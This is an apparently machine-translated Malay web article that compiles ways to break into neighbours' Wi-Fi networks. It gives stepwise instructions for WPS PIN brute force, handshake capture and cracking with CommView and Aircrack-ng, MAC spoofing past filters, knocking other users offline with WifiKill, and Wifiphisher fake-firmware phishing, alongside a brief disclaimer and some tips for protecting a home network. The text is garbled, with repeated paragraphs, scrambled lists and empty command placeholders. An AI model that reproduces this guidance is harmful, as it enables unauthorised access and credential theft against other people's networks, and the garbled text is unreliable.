Kak-vzlomat-parol-ot-wi-fi-5.jpgWIFI WPS WPA TESTER Ketik "Kemas kini"; Banyak utiliti telah dikembangkan untuk menggodam rangkaian Wi-Fi. Sebilangan dari mereka mungkin kelihatan terlalu mudah digunakan, tetapi itu tidak mengurangkan keberkesanannya. Aplikasi dikeluarkan untuk semua platform yang ada, di bawah ini kami akan mempertimbangkan yang paling popular daripadanya.

  1. Sambungan WPS
  2. Senarai rangkaian akan dipaparkan (di sebelahnya terdapat kunci hijau, anda boleh menggodam);
  3. Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  4. Sambung dengan Wi-Fi yang dipilih;
  5. Kod akses muncul di paparan.
  6. WifiKill
  7. - Sekiranya terdapat terlalu banyak peranti yang disambungkan ke Wi-Fi dan had sambungan telah habis, aplikasi ini akan membantu mengosongkan ruang kosong.

Klik "Pemberian";

Senarai pelanggan yang disambungkan ke Wi-Fi akan muncul;

Pilih pelanggan dan ketik "ambil";

Kemudian klik "bunuh";

Kini anda boleh bekerja dalam talian dengan selamat.

  • Untuk iPhone
  • Pemilik peranti Apple sering menggunakan Aircrack-ng, yang memintas maklumat dan memecahkan kod dengan cepat.
  • Pemilik iPhone sering menggunakan "iWep Lite", yang anda hanya perlu hidupkan dan kemudian tentukan Wi-Fi untuk retak. Utiliti akan menganalisis secara automatik dan menunjukkan kod akses.

Bahan mengenai topik ini

Sumber yang digunakan:

https://wifigid.ru/vzlom/kak-vzlomat-wi-fi.

https://bezwifi.ru/router/kak-vzlomat-parol-ot-wi-fi.

https://windwix.ru/kak-vzlomat-wifi/

Kadang-kadang ada situasi di mana Wi-Fi anda berhenti berfungsi. Atau ia menjadi perlu untuk menyambung di jalan, dengan telefon pintar di tangan anda. Saya ingin mengetahui kata laluan dari jiran Wi-Fi, menyelesaikan urusan anda di internet, dan tidak pernah kembali ke penghala orang lain.

Bagaimana untuk mengetahui kata laluan orang lain dari Wi-Fi

Anda boleh sampai ke titik akses pihak ketiga dalam beberapa cara. Kelajuan "perlombongan" kata laluan bergantung kepada silap pemilik, kuasa peranti yang ada dan jumlah masa lapang.

Kaedah pemilihan kata laluan

Penerimaan yang paling mudah, berpatutan dan cekap adalah untuk menggerakkan kombinasi yang jelas. Orang kurang ingat kod, menggunakan variasi berangka yang biasa: 12345678, 1111, 1234,4321 dan sebagainya. Ia patut menambah "qwerty123", "ytrewq321" dan "qazwsx123" ke senarai ini.

Tukar alamat MAC.

Pernahkah anda perhatikan bahawa beberapa perkara Wi-Fi di bandar dilucutkan perlindungan? Ia tidak akan dapat menyambung kepadanya, kerana ia menapis pengguna oleh alamat MAC.

Untuk yang tidak dikenali, alamat MAC adalah pengenal, sejenis kunci yang diberikan kepada peranti yang disambungkan ke rangkaian Ethernet.

Untuk mendapatkan kunci, anda perlu menggunakan program pengimbas khas. Mereka menganalisis mata Wi-Fi di daerah dan mendedahkan alamat mereka.

Pemintasan trafik

Cara yang paling sukar untuk mendapatkan kata laluan orang lain. Dengan bantuan aplikasi pihak ketiga, sejumlah besar data dipintas dengan mana pertukaran router dengan peranti pengguna rangkaian. Maklumat yang diperolehi boleh didekripsi, dapatkan kata laluan daripadanya.

Beberapa penghala mempunyai butang yang sangat tidak berguna - WPS, yang membolehkan anda menyambungkan peranti dalam mod yang dipermudahkan. Secara lalai, banyak penghala masih mengaktifkan WPS. Dan sambungan ke rangkaian seperti itu dilakukan hanya dengan memasukkan kod PIN ini, yang hanya terdiri dari angka.

Komplikasi Massa. Ia adalah perlu bahawa rangkaian menikmati sepenuhnya. Anda perlu berurusan dengan antara muka yang kompleks dan mengelirukan. Jika anda ingin mengalami kekuatan, kemungkinan - Muat turun program "CommView Forwifi". Ia memilih pakej drop-down dan memaparkannya dalam bentuk nod, saluran, jenis isyarat, grid dari sambungan dan titik akses tanpa wayar yang tersedia. Dalam kalangan profesional, ia paling sering digunakan untuk mencari dan menghapuskan virus berbahaya yang menghantar data yang disulitkan ke awan.

Menggodam melalui titik akses pin router

Kaedah ini dibuka pada tahun 2011. Pengguna sampai ke rangkaian melalui penggodaman protokol WPS. Sistem ini termasuk penyulitan dan menetapkan kekunci pelindung secara automatik, tanpa campur tangan pengguna. Penyederhanaan untuk manual.

Hacker yang berpengalaman dengan cepat mendapati kelemahan teknologi yang serius yang membolehkan anda membuka sambungan jiran dalam masa beberapa jam. Hacking berlaku dengan Oclinux dan memerlukan pemahaman tentang asas-asas pengaturcaraan, penyesuai rangkaian wayarles untuk memintas data dan beberapa jam masa lapang.

Jika perisian router menyokong fungsi sedemikian, maka WPS boleh dimatikan.

Pemilihan manual

Phishing akan membantu jika anda mengetahui alamat e-mel jiran, serta anda memahami tahap huruf komputer yang mereka miliki. Intinya adalah untuk menghantar surat ke peti mel mereka dengan permintaan untuk menghantar kata laluan dari Wi-Fi dan maklumat berguna lain.

Ini adalah kaedah penipu untuk mendapatkan nombor kad bank, atau cara yang tidak jujur ​​untuk memilih nilai maya.

Arahan terperinci, bagaimana menggunakan phishing tidak wujud. Bertindak mengikut budi bicara anda. Variasi Mass: menakutkan dengan ditangkap oleh virus, memeras ugut untuk mematikan Internet, atau mendekati dengan lembut - untuk mencadangkan untuk mempercepat penghantaran data, meningkatkan kestabilan rangkaian dan terlebih dahulu borang yang dibuat untuk mencadangkan untuk memasukkan log masuk dan kata laluan kepada router itu.

  • Perisian penggodaman
  • Terdapat beratus-ratus aplikasi untuk mengekstrak maklumat orang lain. Ada yang memanfaatkan kerentanan keselamatan yang ada, yang lain menggunakan kata laluan yang kasar, yang lain mencari alamat mac, atau ada sebagai kamus di mana komuniti Internet memasukkan kata laluan semasa di sekitar titik akses.
  • Brute force - dari bahasa Inggeris, "brute force", kaedah di atas untuk mendapatkan data menggunakan brute force. Sekiranya mangsa tidak menggunakan kombinasi standard, dia harus memasang perisian tambahan dan memahami antara muka.

Pemilihan kombinasi automatik

Beberapa program secara harfiah secara manual, dalam beberapa utas, mengambil kata laluan untuk watak rangkaian baru mengikut watak. Oleh kerana itu, kerja dengan program seperti ini dapat berlangsung dari beberapa hari hingga beberapa bulan, bergantung pada panjang kod yang diperlukan. Yang paling popular di antaranya:

John the Ripper;

Aircrack-ng;

  1. PelangiCrack.
  2. Mereka membolehkan anda menentukan jangka masa kata laluan, serta menggunakan beberapa mekanisme kekerasan, yang secara signifikan mengurangkan kelajuan pencarian dan juga mengurangkan beban pada sistem.
  3. Keretakan wifi
  4. Wifi crack bukanlah penyelesaian utama untuk memecahkan kata laluan, tetapi utiliti berguna untuk semua orang yang tidak biasa dengan bahasa pengaturcaraan yang membingungkan. Berfungsi pada sistem operasi moden, sentiasa dikemas kini.
  5. Program ini sangat mudah digunakan:

Muat turun fail. Ini sering merupakan arkib zip yang mengandungi pemacu dan kamus gabungan yang paling popular. Selalunya juga merangkumi arahan teks dengan tangkapan skrin;

Buka zip fail, jalankan WiCrack.exe dan salin perintah yang ditandatangani dalam manual sebagai "meneka kata laluan" ke dalam baris arahan yang muncul;

  1. Mulakan prosesnya. Varian kata laluan akan tetap berada dalam fail yang terpisah dengan pelanjutan .cap di akar folder program. Kak-vzlomat-parol-ot-wi-fi-.jpg
  2. Pergi ke tab "Import" program itu sendiri dan masukkan fail dengan pelanjutan.
  3. Klik "Mula". Sekiranya data berjaya, kata laluan akan muncul di tetingkap utama.
  4. Tukar alamat mac
  5. Intipati kaedah ini dijelaskan di atas. Anda perlu menuju ke alamat mac supaya Internet pada peranti berfungsi melalui penghala orang lain. Cari ID? Sekarang ubah pada peranti anda. Di komputer, ini dilakukan seperti ini:
  6. Pergi ke "Panel Kawalan".
  7. Pergi ke bahagian "Rangkaian dan Internet", pilih "Pusat Rangkaian dan Perkongsian".

Cari kategori: "Tukar tetapan penyesuai".

Panggil menu konteks di titik akses yang diinginkan dengan butang tetikus kanan, pilih "Properties".

Tab rangkaian, kemudian Konfigurasikan, setelah Lanjutan.

Tandakan "Alamat rangkaian" dan masukkan nombor 12 digit yang didambakan.

Hacker yang berpengalaman dengan cepat mendapati kelemahan teknologi yang serius yang membolehkan anda membuka sambungan jiran dalam masa beberapa jam. Hacking berlaku dengan Oclinux dan memerlukan pemahaman tentang asas-asas pengaturcaraan, penyesuai rangkaian wayarles untuk memintas data dan beberapa jam masa lapang.

Klik "OK" untuk memulakan semula sambungan rangkaian.

  • Pada telefon pintar, menukar alamat mac jauh lebih sukar. Pada Android, anda perlu mendapatkan hak root dan bertarung dengan aplikasi pihak ketiga. Lakukan dengan bahaya dan risiko anda sendiri. Pengimbas alamat Mac
  • Pengimbas alamat Mac mendedahkan data alamat mac di sekitarnya. Ia tidak memerlukan pengetahuan khusus dan tidak mempunyai antara muka yang kompleks. Dalam kes ini, pencipta utiliti tidak penting. Terdapat versi dari ColarSoft. Anda perlu memasangnya, jalankan dan tekan butang "Mula" hijau untuk menganalisis rangkaian di sekitarnya. Data yang diterima disimpan dalam memori komputer, atau dikirim ke penyimpanan Internet. Lajur kedua memaparkan alamat mac semasa. Sekiranya pemilik titik akses tidak menggunakan perlindungan tersebut, pengecam akan ditunjukkan sebagai beberapa xes. Jika tidak, anda akan mendapat gabungan 12 digit.
  • Inti dari platform penggodaman dijelaskan di atas, tetapi berikut adalah senarai program yang relevan dan hebat yang digunakan di seluruh dunia. AIRCRACK
  • ... Ia mampu melakukan semuanya, tetapi ini adalah baris perintah di mana anda perlu memasukkan perintah. Antara muka mesra tidak dihantar; UDARA
  • ... Memintas paket data, meneka kunci menggunakan algoritma licik. Ia dikemas kini beberapa tahun yang lalu, tetapi tidak kehilangan kaitannya; KISMET
  • ... Lebih banyak perlindungan terhadap pencerobohan pihak ketiga, tetapi, jika dikehendaki, membolehkan paket protokol penghala pihak ketiga, dan bahkan menemui rangkaian tersembunyi; CRACKER WIRELESS FERN WI-FI

... Bertujuan untuk keselamatan sistem. Ia mencari kata laluan menggunakan kamus, dan dalam hal perlindungan WEP router, menghubungkan algoritma untuk menampilkan kata laluan yang sebenarnya. Dikemas kini secara berterusan dengan fungsi tambahan;

AIRJACK

... Berfungsi mirip dengan AIRCRACK, tetapi juga dapat membuat titik akses yang salah, yang membantu melindungi yang utama dari penggodaman yang tidak diingini, atau memastikan bahawa mangsa, tanpa mengesyaki penggantian, memasukkan kata laluan sendiri ke penghala yang tidak ada;

ISTERI

... Perisian yang unik, sebenarnya, virus yang menghubungkan ke sistem orang lain dan memaparkan mesej di penyemak imbas, yang mengharuskan anda memasukkan kata laluan dari WiFi, yang sepatutnya memasang kemas kini penting. Pengguna mendengar dan tidak lagi memperhatikan perubahan. Penyerang mendapat apa yang dia mahukan.

Komen untuk menangkap paket data

Saya ingin memberitahu anda lebih banyak mengenai alat ini. Aplikasi ini sentiasa dikemas kini dengan mekanik dan kategori yang berharga. Terutamanya digunakan oleh pengaturcara rangkaian dan pentadbir rangkaian tanpa wayar.

  1. Program ini membagi paket data menjadi protokol, menunjukkan kekuatan isyarat, kelajuannya dan parameter berguna yang lain.
  2. Untuk meminjam Internet terdekat, anda perlu memuat turun aplikasi dan mengimbas WiFi yang dikehendaki dari senarai rangkaian. Program ini akan memaparkan keseluruhan paket data yang dihantar. Commview membolehkan anda menggunakan fungsi "node reassociation". Pengguna akan memutuskan sambungan dari sambungan secara automatik, dan menyambung kembali serta-merta, dan program akan membuka protokol EAPOL. Mereka mengandungi maklumat yang diperlukan - kata laluan yang diinginkan untuk menggodam rangkaian Wi-Fi.
  3. AirCrack-NG akan membantu menyahkod protokol yang diterima.
  4. Menggunakan Aircrack ng
  5. Ini adalah alat yang kompleks yang memerlukan persiapan awal dan banyak langkah tambahan. Menekan "mulakan" dan menunggu hasil positif tidak berbaloi. Setelah menerima semua kemungkinan data melalui Commview, anda perlu:
  6. Muat turun dan jalankan Aircrack ng, pergi ke tab pertama.
  7. Masukkan jalan ke fail dengan paket yang dipintas di baris "Nama Fail".
  8. Dalam kategori "Penyulitan", tentukan "WPA".

Terdapat kamus, atau pangkalan data kata laluan yang popular, anda perlu memasukkannya ke dalam senarai Senarai Dunia.

Tandakan kotak pilihan "Pilihan lanjutan".

Dalam "Tentukan ESSID" tulis nama rangkaian yang dikehendaki.

  • Di tetingkap yang muncul, masukkan alamat MAC rangkaian, yang dapat diperoleh menggunakan Pemindai alamat Mac.
  • Lancarkan. Analisis data yang ada akan berlangsung dari 5 jam hingga beberapa hari.
  • Cara menggodam Wi-Fi dari telefon
  • Lebih sukar untuk mendapatkan kata laluan jiran dari telefon. Pada iPhone, prosesnya memerlukan tahap pengetahuan yang luar biasa kerana sistem tertutup dan sekatan buatan. Dan pada Android - mendapatkan hak root, yang merupakan ancaman tersendiri. Selepas - pemasangan perisian yang sesuai. Ini adalah kamus yang sama, pemaksaan kasar, pemburu pengecam, dan sebagainya. Terdapat banyak aplikasi. Mereka memerlukan langkah yang sama seperti versi komputer. Kadang kala memerlukan lebih banyak masa untuk memproses maklumat. Berikut adalah utiliti yang paling popular. Disahkan, berkualiti tinggi, tidak ada virus.
  • Aplikasi Android

Sambungan WPS;

Tentukan wifi dengan WPS;

WIFI WPS WPA TESTER;

  1. WifiKill;
  2. Rangkaian Spoofer;
  3. WiFi Anda.
  4. Yang paling dipercayai, selesa dan paling mudah adalah WPS Connect.

Ia hanya berfungsi dengan rangkaian yang dilindungi oleh teknologi WPS dan dikendalikan seperti berikut:

Pada skrin utama, kemas kini senarai titik akses;

Selepas memuatkan, pilih titik dengan kualiti isyarat tertinggi;

Ambil kata laluan dari pangkalan data yang ada;

Sekiranya anda mempunyai hak root, beberapa pilihan akan muncul di layar yang membolehkan anda menyambung ke penghala yang dipilih.

Video penggodaman Wi-Fi di Android menggunakan sambungan Wps

Akibat menggunakan Wi-Fi orang lain

Tidak ada yang akan memenjarakan anda kerana penggunaan rangkaian Wi-Fi orang lain yang "baik". Tetapi jika, setelah campur tangan anda, maklumat kad kredit seseorang telah hilang, kata laluan e-melnya telah berubah - bimbang. Pakar dapat mengenal pasti sesiapa sahaja yang merosakkan fail, yang mencuri protokol Internet dan data berguna lain. Anda boleh "terguncang" dan bahkan dikeluarkan dari komputer anda, tetapi jika ini bukan tindakan anda, semuanya akan menanggung kos ketidakselesaan anda selama beberapa hari, membayar untuk memanjakan diri.

Ramai daripada mereka boleh diakses menggunakan program hack-tapten-portal, cari butiran dalam artikel "Portal Cepat, Mudah dan Kerja Tawanan (hotspot dengan kebenaran pada antara muka web)". Untuk pengguna yang benar-benar lanjutan, lihat artikel "Bypassing the portal memintas menggunakan OpenVPN". Penyesuai wayarles untuk hacking wi-fi Pilihan yang baik untuk pemula ialah Alfa Awus036nha dengan Antena Alfa Ars-N19. Ini biasanya merupakan penyesuai Wi-Fi yang sangat baik untuk menggodam rangkaian tanpa wayar, termasuk untuk serangan ke atas WPS. The tolak kad ini adalah bahawa ia agak lama dan tidak menyokong protokol moden.

Untuk menyokong protokol moden, anda boleh memilih ALFA dengan antena luar dari senarai ini.

Wifigid.

Ru dan pengarang secara peribadi artikel nerd tidak memanggil untuk penggodaman

Wifi! Terutamanya rangkaian asing !!! Artikel ini ditulis dalam tujuan pendidikan untuk meningkatkan keselamatan maklumat peribadi. Mari kita tinggal dengan selamat!

Di bawah ini dianggap sebagai kaedah umum untuk menggodam rangkaian tanpa wayar dan arahan atau rujukan kepada mereka. Di samping itu, cadangan disediakan untuk meningkatkan perlindungan rangkaian rumah mereka sendiri dari kemungkinan jiran jahat dan penceroboh lain. Saya harap artikel itu berguna untuk semua pembaca. Kami juga mengesyorkan membaca bahan yang dicadangkan dengan lebih terperinci dan meninggalkan komen anda.

  1. Kandungan
  2. Kaedah penggodaman
  3. Rangkaian wayarles menggabungkan banyak teknologi. Dan di mana banyak teknologi ada dan banyak teknologi keselamatan. Dan di bahagian bawah "itik dalam telur" ini terdapat lubang dalam sistem keselamatan. Dan pada setiap lubang yang mungkin ada kaedah serangan sendiri. Dalam bahagian ini, saya ingin menunjukkan semua cara yang mungkin untuk menggodam Wi-Fi dan menembusi rangkaian wayarles. Tetapi yang mana dari pilihan-pilihan ini akan berfungsi, sepenuhnya bergantung kepada keadaan tertentu. Di samping itu, ia boleh berlaku bahawa rangkaian dilindungi sepenuhnya dan tidak tertakluk kepada penggodaman pada masa kini)
  4. Freebie! Berapa banyak keinginan yang menyebabkan freebies dari semua orang. Semua mahu internet orang lain. Tetapi satu perkara adalah dengan cepat merebut kata laluan dan membanggakan rakan sekelas atau menyelamatkan di sebuah asrama di internet, perkara lain adalah untuk menangani teknologi itu sendiri, yang akan membolehkan akses kepada hampir mana-mana rangkaian. Jangan berlari untuk berbangga, hanya kajian dan pemahaman tentang proses akan menjadikan anda pakar dalam bidang ini. Tugas saya sekarang untuk menunjukkan liputan peluang dan keindahan kreatif dalam hal ini.
  5. Cara utama untuk menggodam Wi-Fi orang lain:
  6. Rangkaian tidak dilindungi.
  7. Pemilihan Kata Laluan Manual.
  8. Kata laluan kejam.
  9. Pemilihan kod WPS.

Phishing.

Pangkalan kata laluan.

Mungkin jiran anda adalah pengaturcara berbakat. Dan jika dia mengetahui bahawa orang luar telah memasuki perlindungan penghala, dia akan bergegas untuk menyekat udara dan merosakkan mood dengan kaedah yang diketahui olehnya.

Memintas penapis.

Pemintasan "jabat tangan" dan penyahkodinya.

Dalam kes saya, perintah ini kelihatan seperti ini:

Menggodam penghala dan mengeluarkan kata laluan terbuka.

Secara ringkas kami akan cuba melihat semua kaedah ini. Saya tidak akan pergi jauh ke dalam butiran, tetapi jika anda tiba-tiba mempunyai soalan - tanya dia dalam komen. Adakah mungkin untuk menggodam?

Rangkaian yang tidak dilindungi

Biasanya pada masa kita semua rangkaian disulitkan dan dilindungi oleh kunci. Kira-kira seperti dalam gambar berikut:

Tetapi masih terdapat titik akses yang tidak dilindungi. Dan mereka boleh disambungkan sepenuhnya - tanpa kata laluan. Contoh titik seperti itu adalah tempat awam, Metro.

Cadangan!Cadangan!

Sentiasa melindungi kata laluan rangkaian rumah anda.

Pemilihan manual

Dua cara pertama ini ditulis hanya untuk menunjukkan bahawa kadang-kadang menggunakan tindakan teknikal yang kompleks dan tidak boleh, kerana Biasanya segala-galanya kelihatan, ia bernilai sedikit pemikiran.

Rata-rata pengguna biasanya menetapkan kata laluan yang mudah - cuba bayangkan apa yang dia boleh masukkan dan meneka. Ia berfungsi dengan baik untuk mengetahui kata laluan Wi-Fi dari rakan dan jiran. Bagaimana jika anda sudah mengetahui beberapa kata laluan jiran anda? Orang sangat gemar mengulangi diri mereka, dan mereka biasanya memasukkan perkara yang sama. Jarang bekerja, tetapi tepat. Terutama pada rangkaian WEP lama, di mana kata laluan kurang daripada 8 aksara dibenarkan - "12345" dan "QWERTY" sering dijumpai di sana.

TOP 25 kata laluan Wi-Fi yang paling biasa

Banyak penyedia (Rostelecom, ByFly, Yota dan lain-lain) kadang-kadang menggunakan kata laluan "lalai" pada model mereka. Cari mereka di Internet atau di laman web kami, jika anda bernasib baik)

  • Kekerasan
  • Brute Force adalah kaedah kata laluan brute-force secara automatik. Lagipun, anda memasukkan kata laluan dengan bebas? Dan apa yang perlu dilakukan sekiranya anda memaksa program untuk menjalani semua kemungkinan pilihan dan cuba berhubung dengannya.
  • Terdapat nilai tambah - model lama pecah tanpa mengesan serangan dan kata laluan yang lemah (WEP). Terdapat kelemahan - model baru dapat mengesan anda (anda harus bertopeng) dan mengenakan kelewatan kekerasan, atau bahkan larangan sepenuhnya pada mesin penyerang. Kelemahan lain ialah penghala moden memaksa pengguna memasukkan kata laluan panjang yang rumit, yang memerlukan masa bertahun-tahun untuk melakukan kekerasan. Oleh itu, anda harus mencari kaedah lain.
  • Tetapi tetap, cuba selesaikan rangkaian untuk kata laluan ringan, atau jika WEP, dan bukan WPA / WPA2, ia pasti berbaloi. Kebarangkalian lubang sentiasa ada.

Sorotan mengenai Brutus:

Program dapat menggunakan keseluruhan penghitungan pilihan - sesuai untuk rangkaian WEP, atau untuk model penghala yang memaksa anda untuk memaksa kata laluan yang rumit di mana serangan kamus tidak mungkin dilakukan.

Terdapat varian serangan kamus - apabila fail dengan kata laluan yang paling umum dimuat. Terdapat banyak fail ini - dalam satu Kali Linux terdapat beberapa lusin daripadanya, dan berapa banyak yang ada di rangkaian. Bagi saya, cukup untuk memeriksa kata laluan asas dengan senarai kecil - bagaimanapun, penggodaman melalui kekerasan bukan lagi pilihan, tetapi untuk pemeriksaan asas dan menjimatkan masa, senarai paling mudah sudah cukup.

  1. Program ini berfungsi dalam beberapa utas - iaitu secara serentak boleh mencuba banyak pilihan sekaligus. Tetapi ada keanehan di sini: penghala itu sendiri dapat membuang percubaan seperti itu, memperkenalkan kelewatan kebenaran, atau reboot sepenuhnya. Mereka. aliran perlu dimainkan dengan teliti. Dalam apa jua keadaan, periksa semua yang ada pada perkakasan anda, jadi anda pasti akan mengetahui.
  2. Sebilangan orang menulis mengenai proksi ... Tetapi jenis proksi apa yang ada))) Kami berhubung melalui udara) Intinya adalah bahawa beberapa program berjaya menutup permintaan mereka untuk peranti yang berbeza, yang memungkinkan untuk berfungsi dalam pelbagai rangkaian.
  3. Saya akan memberikan pilihan program pada akhirnya - biasanya satu program seperti Aircrack (pemimpin pasaran) dapat melakukan semua tindakan dengan sendirinya. Tidak perlu mencipta semula roda atau memasang 100,500 program. Sementara itu, saya ingin meneruskan perbincangan dengan kaedah penggodaman.

Memintas "jabat tangan"

Salah satu kaedah yang paling berkesan adalah memintas jabat tangan. Apa ini? Juga sejenis kejam murni, hanya dengan pemintas awal cipher dan percubaan selanjutnya untuk menyahsulitnya. Berikut adalah garis panduan ringkas:

Anda duduk dengan senyap di jaring.

Rangkaian rosak.

Komputer anda menyambung semula.

Apa yang berlaku pada saat penyambungan semula: komputer anda menghantar semula kata laluan ke penghala, penghala menerimanya dan, jika berjaya dimasukkan, mewujudkan sambungan. Dalam praktiknya, ini benar-benar tidak dapat dilihat - tidak memutuskan rangkaian, atau memasukkan kata laluan - semuanya dilakukan secara automatik oleh sistem anda sendiri.

Proses menghantar kata laluan ini boleh disebut "jabat tangan" atau "jabat tangan". Tetapi kaedah ini mempunyai kelemahan - data dihantar pada mulanya dalam bentuk yang dienkripsi. Tetapi dengan keinginan yang kuat, cipher ini masih dapat dibongkar menjadi beberapa bahagian (malah ada perkhidmatan) dan membuka data yang dilindungi kata laluan. Dan tidak akan memerlukan lebih banyak masa daripada kekuatan kasar. Ini adalah asas keseluruhan kaedah. Aircrack, yang sudah biasa kita kenal, dapat menembak jabat tangan, dan HashCat (penjana brute-force dan password) dapat memaksa kata laluan. Tetapi lebih baik anda menonton video di atas. Ini adalah cara yang sama ketika mereka memecahkan wifi jiran dengan tenang. Kod WPS

Beberapa penghala mempunyai butang yang sangat tidak berguna - WPS, yang membolehkan anda menyambungkan peranti dalam mod yang dipermudahkan. Secara lalai, banyak penghala masih mengaktifkan WPS. Dan sambungan ke rangkaian seperti itu dilakukan hanya dengan memasukkan kod PIN ini, yang hanya terdiri dari angka.

Kod PIN hanya mempunyai 8 digit. Di atas, saya sudah bercakap mengenai kebolehterimaan WEP brute-force brute-force penuh, tetapi di sini ia lebih mudah - hanya angka. Di samping itu, terdapat korelasi yang membolehkan kaedah membuat pilihan secara berpasangan - 4 digit pertama, dan kemudian 4 digit. Semua ini mempercepat pencarian, dan titik dengan WPS terbuka dapat dipecahkan dalam beberapa jam.

  1. Pilihan serangan lain adalah menggunakan kod lalai. YA! Beberapa peranti berasal dari kilang dengan kod PIN yang sama dihidupkan) Dan program yang dicadangkan sudah mengetahui kata laluan ini, jadi semuanya boleh menjadi lebih mudah.
  2. Cadangan:
  3. lumpuhkan WPS di penghala anda! Kebanyakannya tidak berguna.

Pancingan data Kaedah lain yang menarik adalah memaparkan halaman anda dari pengguna web ... Ya, ini dapat dilakukan tanpa disambungkan ke rangkaian. Tetapi penggantian dapat diperhatikan. Pilihan yang paling sah: .

Jalur akses dengan nama yang sama dari rangkaian yang dikompromikan dibuat.

Tanda dan nama yang baik akan memaksa mangsa untuk menyambungnya cepat atau lambat.

Setelah log masuk, kata laluan dimasukkan, yang berjaya sampai kepada anda.

Dalam kes saya, perintah ini kelihatan seperti ini:

Kaedahnya berfungsi, tetapi di sini anda tidak boleh melakukannya tanpa keberuntungan. Terdapat juga kaedah pelaksanaan perisian yang tersedia, misalnya, menggunakan

Dalam kes saya, perintah ini kelihatan seperti ini:

Wifiphisher

  • Mari kita perhatikan lebih dekat aplikasi ini, kerana vektor serangan menarik. Kami memerlukan Kali Linux (ya, kawan-kawan, semua perisian penggodaman percuma yang hebat dari mana-mana peringkat ada, jadi kenakan) Di terminal, jalankan:

Dalam kes saya, perintah ini kelihatan seperti ini:

wifiphisher

Dalam kes saya, perintah ini kelihatan seperti ini:

Sejurus selepas pelancaran, program mula mencari rangkaian terdekat (semua program dengan penggodaman rangkaian melakukan ini):

Perhatikan jumlah rangkaian. Cari yang anda perlukan dalam senarai ini dan masukkan nombornya. Seterusnya, pelbagai senario serangan akan dicadangkan: Semua pilihan hampir serupa, satu-satunya perbezaan ialah pengguna rangkaian asing akan mendapat kebenaran atau kemas kini perisian. Saya cadangkan memperhatikan perkara berikut:

Halaman Peningkatan Firmware - anda akan diminta untuk mengemas kini firmware penghala itu sendiri. Ia kelihatan menarik dan boleh dipercayai, tetapi anda hanya perlu memasukkan kunci yang sama:

Sementara itu, kata laluan tiba di konsol seperti ini:

Itu sahaja. Penggunaan anggaran semua program adalah berikut. Saya tidak akan membahasnya secara terperinci, jika tidak, keseluruhan buku akan habis. Saya menetapkan vektor serangan, memberi petunjuk - dan anda sudah mengkaji setiap arah secara bebas. Pada akhir artikel, saya akan memberikan bonus menarik dari penggodam profesional bagi mereka yang ingin mendalami.

Hadkan akses ke maklumat PIN, jangan masukkan ke laman web yang meragukan.

Proses menghantar kata laluan ini boleh disebut "jabat tangan" atau "jabat tangan". Tetapi kaedah ini mempunyai kelemahan - data dihantar pada mulanya dalam bentuk yang dienkripsi. Tetapi dengan keinginan yang kuat, cipher ini masih dapat dibongkar menjadi beberapa bahagian (malah ada perkhidmatan) dan membuka data yang dilindungi kata laluan. Dan tidak akan memerlukan lebih banyak masa daripada kekuatan kasar. Ini adalah asas keseluruhan kaedah. Aircrack, yang sudah biasa kita kenal, dapat menembak jabat tangan, dan HashCat (penjana brute-force dan password) dapat memaksa kata laluan. Tetapi lebih baik anda menonton video di atas. Ini adalah cara yang sama ketika mereka memecahkan wifi jiran dengan tenang. Cadangan:

Berhati-hatilah jika rangkaian yang sebelumnya disambungkan secara automatik oleh peranti tanpa masalah meminta kata laluan - terutamanya pada halaman pihak ketiga (kemas kini perisian, kata laluan di VKontakte, dll. - ini tidak berlaku). Perhatikan rangkaian pendua di rumah.

Pangkalan kata laluan.

Terdapat program dan perkhidmatan yang menyimpan pangkalan data kata laluan titik akses tempat duduk awam. Ini benar terutama untuk mana-mana kafe di bandar-bandar besar. Mahu memecahkan kafe itu? Ya, kenapa, biasanya seseorang yang berkaitan dengannya, yang bermaksud ada kemungkinan kata laluan itu dilayari ke pangkalan.

Contoh aplikasi perkhidmatan sedemikian: Peta Wi-Fi atau imbasan penghala. Dan kad akan dipaparkan, dan titik yang ada, dan dirinya sendiri akan disambungkan.

Buat pilihan perkhidmatan dan dalam kes kecurigaan penggodaman, periksa diri anda di pangkalan ini. Malah lebih mudah - ubah kata laluan dari Wi-Fi dalam setengah tahun.

Hacking router.

  • Kadang-kadang anda mempunyai peluang untuk menyambung pada wayar ke Wi-Fi, atau anda tahu alamat IP luaran dari Internet dan anda boleh mengakses router (kadang-kadang anda boleh menentukan dengan banyak kebarangkalian untuk menentukan dan mengimbas).
  • Kemudian anda boleh cuba memilih kata laluan untuk memasuki panel kawalannya. Ramai yang masih meninggalkannya secara lalai admin / admin (login / kata laluan). Dan sudah dalam tetapan, kata laluan Wi-Fi disimpan dalam bentuk terbuka.

Bypass Filters.

Sesetengah titik akses tidak membenarkan anda, semata-mata kerana anda mempunyai alamat MAC yang tidak sesuai. Kadang-kadang ia berlaku. Ini tidak lagi mengenai penggodaman, tetapi kadang-kadang keseluruhan tugas penggodaman dikurangkan untuk mengubah poppy - sebagai contoh, apabila anda sebelum ini berjaya dihubungkan, dan sekarang ia tidak membenarkan apa-apa, kerana Pentadbir atau ibu bapa yang mengharamkan peranti anda di Poppy. Penyelesaiannya adalah mudah - mengubahnya.

  1. Ia berlaku:
  2. Senarai hitam. Kemudian anda hanya perlu menukar alamat itu kepada yang tidak dalam senarai ini. Program Universal - Macchanger.
  3. Senarai putih. Hanya peranti yang dinyatakan di dalamnya disambungkan. Kemudian anda perlu melihat peranti ini dan alamat mereka (airodump-ng sesuai), dan selepas menyesuaikan diri dengan mereka dengan makcheter yang sama.
  4. Perlindungan Rangkaian

Benarkan beberapa masalah untuk memberi perhatian kepada siapa yang boleh menyambung ke rangkaian anda:

Letakkan kata laluan yang canggih pada Wi-Fi.

Letakkan kata laluan yang kompleks pada panel penghala itu sendiri.

  • Apabila Paranas - termasuk menapis alamat MC, hanya membenarkan peranti anda.
  • Matikan WPS (kadang-kadang dipanggil QSS).

Menggodam dari telefon

Semua kaedah di atas adalah terutamanya mengenai penggunaan PC. Persekitaran yang optimum untuk penggodaman masih Kali Linux - semuanya sudah disediakan. Versi melampau ialah Windows. Telefon lebih rumit. Semasa saya menyediakan artikel, saya membaca "penerbitan jiran" dengan cadangan untuk melekat Cali pada EPPLE, atau pelancaran Aircrack-Ng percuma di atas mereka di Android atau iOS, dan bonus dengan pelupusan kata kunci yang aneh - Pendek kata, ia tidak berlaku. Mahu memecahkan - letakkan Kali, jika terdapat hanya telefon - tidak akan ada penyelesaian yang sejuk.

